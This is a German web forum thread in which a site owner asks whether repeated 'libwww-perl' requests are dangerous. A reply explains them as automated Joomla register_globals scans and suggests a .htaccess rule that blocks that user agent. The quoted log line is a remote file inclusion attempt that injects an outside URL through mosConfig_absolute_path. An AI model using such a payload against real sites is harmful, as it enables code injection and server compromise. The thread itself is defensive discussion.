Frage zu libwww-perl

[anarix]

Hallo,
seid einiger Zeit habe ich zugriffe von dem Agent "libwww-perl/5.79". Er ruft Seiten auf wie

/ind ex.php?o ption=com_virtuem art&p age=shop.browse &categor y_id=&keyword=& manufacturer_id= &Itemid= &mosConfi g_absolute_path=http:/ /w ww.e lite whe els. ru/ima ges/stori es/.c n n?

Ich habe mal ein bißchen recherchiert. Das heißt wohl, dass da jemand versucht, fremden Code, der über den GETTER "mosConfig_absolute_path" kommt einzuschleusen. Meine index.php nimmt allerdings gar keine $_GET auf, ich verarbeite auch nirgends so etwas wie $_GET["mosConfig..."]. Deshalb fühle ich mich eigentlich recht sicher, allerdings kommen die Angriffe regelmäßig. Das würde man doch nicht machen, wenn da nicht irgendwas klappen würde, oder?

Die Angriffe kommen auch über eine andere Seite, welche die Variable $_GET["u"] weiterverarbeitet. Da gibt es aber vorher die Abfrage, ob dieser Wert numerisch ist, bevor sie verarbeitet wird. Denke, dass sollte doch auch sicher sein, oder?

Hat da jemand Erfahrung? Können diese Attacken mir was? Wenn ja, was tun (Shared Server), wenn nein, warum attackieren die dann ständig?

Vielen Dank Euch allen im Voraus.

[bloddy newbie]

Da probieren sich Scriptkiddies. Kein Grund zur Beunruhigung.

Joomla ist ein sehr verbreitetes CMS System und es gibt doch noch einige Betreiber, die Register Globals auf On geschaltet haben. Da du ja scheinbar weder ein Joomla verwendest und in deiner PHP-Config hoffentlich sowieso die Register Globals Direktive auf "Off" steht, hast du nichts zu befürchten.

Dieses Perl-Script, dass diesen Angriff verursacht, wird sicherlich eine Liste an Domains durchgehen und den einen oder anderen Treffer landen. Nur eben nicht bei dir. Du könntest ja mittels .htaccess den UserAgent libwww-perl komplett aussperren, da dies sowieso meist Spider oder "böse" Tools sind:

Code: Alles auswählen

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl
RewriteRule ^.*$ - [F]

Grüße

[anarix]

ok. Danke für die schnelle Antwort